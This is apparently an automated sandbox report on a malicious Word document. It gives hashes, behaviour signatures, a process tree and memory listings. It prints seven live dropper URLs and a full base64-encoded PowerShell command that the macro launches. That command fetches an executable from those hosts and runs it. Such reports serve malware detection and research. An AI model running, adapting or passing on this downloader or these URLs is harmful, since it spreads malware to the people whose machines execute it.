Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    13-06-2024 23:31

General

  • Target

    a71d78be09876fcbbebc701107433b43_JaffaCakes118.doc

  • Size

    125KB

  • MD5

    a71d78be09876fcbbebc701107433b43

  • SHA1

    c8cc5a47e49c0116b5a8434f4223b63ff1220b05

  • SHA256

    d0b0c89fd70b604e0abda15a2af6e8d0fcef712db05d5b15705862e2dc1120f2

  • SHA512

    d543554732070218cf1baf413db6542f844af76a9cbe82f0f7db39098f09ddce56ba4d4edcd423c300e7594a4474d589992a354005d4a4c5bf15f4bbee062f9d

  • SSDEEP

    1536:j+wLAAAAcAAAAAUmPxwMddylbvuNm9F9qqWa08l1rtTkbs:ZLAAAAcAAAAAUSxRYMv8l1pTkbs

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://movewithketty.com/cgi-bin/LXr/

exe.dropper

http://pixnbeats.com/chanakua.org/6/

exe.dropper

http://trainingbodies.com/Reporting/YR/

exe.dropper

http://voxdream.com/wp-includes/0Oj/

exe.dropper

https://travcalls.com/blogs/E/

exe.dropper

http://aeropilates.cl/wp-content/rNM/

exe.dropper

http://hesa.co.id/_errorpages/1x/

Signatures

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a71d78be09876fcbbebc701107433b43_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABXAHIAaQBlAGcAZQBhAD0AKAAoACcAVABsACcAKwAnAGYAJwApACsAKAAnAHkAMAAnACsAJwA0ADUAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAcABSAE8AZgBpAEwAZQBcAHAAdABoAGkAeABfAFYAXABPAFMAZwA1AFYAawByAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAEUAQwB0AE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAcgBJAGAAVABZAFAAUgBvAHQAYABvAEMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAJwApACsAKAAnADEAJwArACcAMgAsACcAKQArACcAIAB0ACcAKwAnAGwAJwArACgAJwBzADEAMQAsACcAKwAnACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEUAZQBwAHMAbQA0ADAAIAA9ACAAKAAoACcARQBxACcAKwAnAGYAJwApACsAKAAnAGsAaQAnACsAJwBzACcAKQApADsAJABDAHoAdQBsAGQAbwB5AD0AKAAnAFgAJwArACgAJwB5ADYAJwArACcAdwA3AHUAJwApACsAJwA1ACcAKQA7ACQAQwBqADIANwB3AHUAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAE4AJwArACcAdABjACcAKQArACgAJwBQAHQAaABpACcAKwAnAHgAJwArACcAXwB2ACcAKQArACcATgB0ACcAKwAnAGMATwAnACsAJwBzAGcAJwArACgAJwA1AHYAJwArACcAawAnACkAKwAnAHIATgAnACsAJwB0AGMAJwApAC4AIgByAGAARQBwAEwAQQBjAEUAIgAoACgAJwBOAHQAJwArACcAYwAnACkALABbAHMAVAByAGkATgBnAF0AWwBjAEgAYQByAF0AOQAyACkAKQArACQARQBlAHAAcwBtADQAMAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQATABzADMAcwBsADUAOAA9ACgAKAAnAFQAJwArACcAeQBiAHgAZgAnACkAKwAnAGUAZwAnACkAOwAkAFoAdwA5AGwAbwA4AGEAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAGIAYwBsAGkARQBOAHQAOwAkAEEAaQBkAGwAMwBuAGsAPQAoACcAaAAnACsAKAAnAHQAdABwADoAJwArACcALwAvAG0AbwAnACkAKwAnAHYAJwArACgAJwBlAHcAJwArACcAaQB0AGgAJwArACcAawAnACkAKwAoACcAZQB0ACcAKwAnAHQAeQAnACkAKwAnAC4AJwArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAGMAJwApACsAKAAnAGcAaQAtACcAKwAnAGIAJwApACsAJwBpAG4AJwArACcALwBMACcAKwAnAFgAJwArACcAcgAnACsAKAAnAC8AKgAnACsAJwBoACcAKQArACgAJwB0AHQAJwArACcAcAA6AC8ALwAnACsAJwBwACcAKQArACgAJwBpAHgAJwArACcAbgBiACcAKQArACgAJwBlAGEAdABzAC4AJwArACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AYwAnACsAJwBoAGEAbgAnACkAKwAoACcAYQBrAHUAYQAuAG8AJwArACcAcgBnACcAKwAnAC8AJwArACcANgAvACcAKwAnACoAaAB0AHQAcAA6AC8ALwB0AHIAJwApACsAKAAnAGEAJwArACcAaQBuACcAKQArACcAaQBuACcAKwAnAGcAJwArACgAJwBiAG8AJwArACcAZABpACcAKQArACgAJwBlAHMALgBjAG8AbQAnACsAJwAvACcAKQArACcAUgAnACsAKAAnAGUAcABvAHIAJwArACcAdABpACcAKQArACgAJwBuACcAKwAnAGcALwBZACcAKQArACcAUgAvACcAKwAoACcAKgBoAHQAJwArACcAdABwACcAKQArACgAJwA6ACcAKwAnAC8ALwB2ACcAKwAnAG8AeAAnACkAKwAnAGQAcgAnACsAJwBlACcAKwAoACcAYQBtACcAKwAnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAoACcAdwBwAC0AaQBuACcAKwAnAGMAJwArACcAbAAnACkAKwAoACcAdQBkAGUAcwAvACcAKwAnADAAJwApACsAJwBPACcAKwAnAGoALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAcwA6AC8AJwArACcALwB0ACcAKwAnAHIAYQB2ACcAKQArACcAYwBhACcAKwAnAGwAJwArACgAJwBsAHMALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACgAJwBiAGwAbwAnACsAJwBnAHMALwAnACkAKwAoACcARQAnACsAJwAvACoAJwApACsAKAAnAGgAdAAnACsAJwB0AHAAOgAvACcAKwAnAC8AYQBlACcAKQArACcAcgBvACcAKwAoACcAcAAnACsAJwBpAGwAYQAnACkAKwAnAHQAZQAnACsAJwBzAC4AJwArACgAJwBjACcAKwAnAGwALwAnACkAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAJwArACcAbwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwArACcAdAAvAHIATgBNAC8AKgBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6AC8ALwBoAGUAJwArACcAcwAnACkAKwAoACcAYQAuACcAKwAnAGMAbwAnACsAJwAuAGkAJwArACcAZAAvAF8AZQByACcAKQArACcAcgAnACsAJwBvAHIAJwArACgAJwBwACcAKwAnAGEAZwAnACkAKwAoACcAZQBzAC8AJwArACcAMQAnACkAKwAnAHgALwAnACkALgAiAFMAUABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgB4AGUAcQB3ADUAOAA9ACgAKAAnAEIAZQAnACsAJwBpACcAKQArACgAJwBfAGUAJwArACcAZwAnACkAKwAnADAAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWABlADQAMgA0AHAAMQAgAGkAbgAgACQAQQBpAGQAbAAzAG4AawApAHsAdAByAHkAewAkAFoAdwA5AGwAbwA4AGEALgAiAEQAYABPAGAAVwBuAEwAbwBBAGQAZgBpAGwAZQAiACgAJABYAGUANAAyADQAcAAxACwAIAAkAEMAagAyADcAdwB1AHMAKQA7ACQASgBrAHoAMwByAF8AcwA9ACgAJwBUACcAKwAnAG4AdQAnACsAKAAnAHAAJwArACcAbgBhAGIAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAQwBqADIANwB3AHUAcwApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADMANQA2ADEAMQApACAAewAmACgAJwBJAG4AJwArACcAdgBvAGsAJwArACcAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABDAGoAMgA3AHcAdQBzACkAOwAkAE4AaQBpAHAAbwB1AHgAPQAoACcAUwAnACsAKAAnAHAAJwArACcAaAB3ADkAJwApACsAJwBkAHYAJwApADsAYgByAGUAYQBrADsAJABMAGwANwBwAG8ANgBvAD0AKAAnAFcAeQAnACsAKAAnAGoAagByACcAKwAnAHoAJwApACsAJwBiACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATABzAHYAOQAyAGYAMAA9ACgAJwBCAGcAJwArACgAJwAyAHYAawAnACsAJwB5ADUAJwApACkA
      1⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      d36320ae6bb9c4fbe03a29a42817fe44

      SHA1

      37f6462754cf1b90cbdf278700ffe85b4ccce73d

      SHA256

      281e37cc20db63d719a7cb708ff0b8ce6a14d6ca67f89b106f0bd193d22c9165

      SHA512

      74b849d169344b54893eda2ace5c108296a6bc3b291e4fc35a8c9826687daf951cb20196f872fd8450f16a65f75e996e83b3d2068e3a0a0298dd9d494529dd6a

    • memory/2020-29-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-54-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-6-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-0-0x000000002F521000-0x000000002F522000-memory.dmp

      Filesize

      4KB

    • memory/2020-11-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-10-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-14-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-13-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-12-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-9-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-30-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-85-0x0000000070D1D000-0x0000000070D28000-memory.dmp

      Filesize

      44KB

    • memory/2020-25-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-40-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-39-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-38-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-37-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-33-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-32-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-31-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-8-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-7-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-84-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2020-21-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-20-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-18-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-17-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-16-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-15-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-56-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-55-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-2-0x0000000070D1D000-0x0000000070D28000-memory.dmp

      Filesize

      44KB

    • memory/2020-53-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-52-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-51-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-62-0x0000000070D1D000-0x0000000070D28000-memory.dmp

      Filesize

      44KB

    • memory/2020-63-0x0000000000840000-0x0000000000940000-memory.dmp

      Filesize

      1024KB

    • memory/2020-64-0x0000000005D40000-0x0000000005E40000-memory.dmp

      Filesize

      1024KB

    • memory/2020-65-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-66-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-67-0x0000000005970000-0x0000000005A70000-memory.dmp

      Filesize

      1024KB

    • memory/2020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2876-49-0x000000001B890000-0x000000001BB72000-memory.dmp

      Filesize

      2.9MB

    • memory/2876-50-0x0000000001F70000-0x0000000001F78000-memory.dmp

      Filesize

      32KB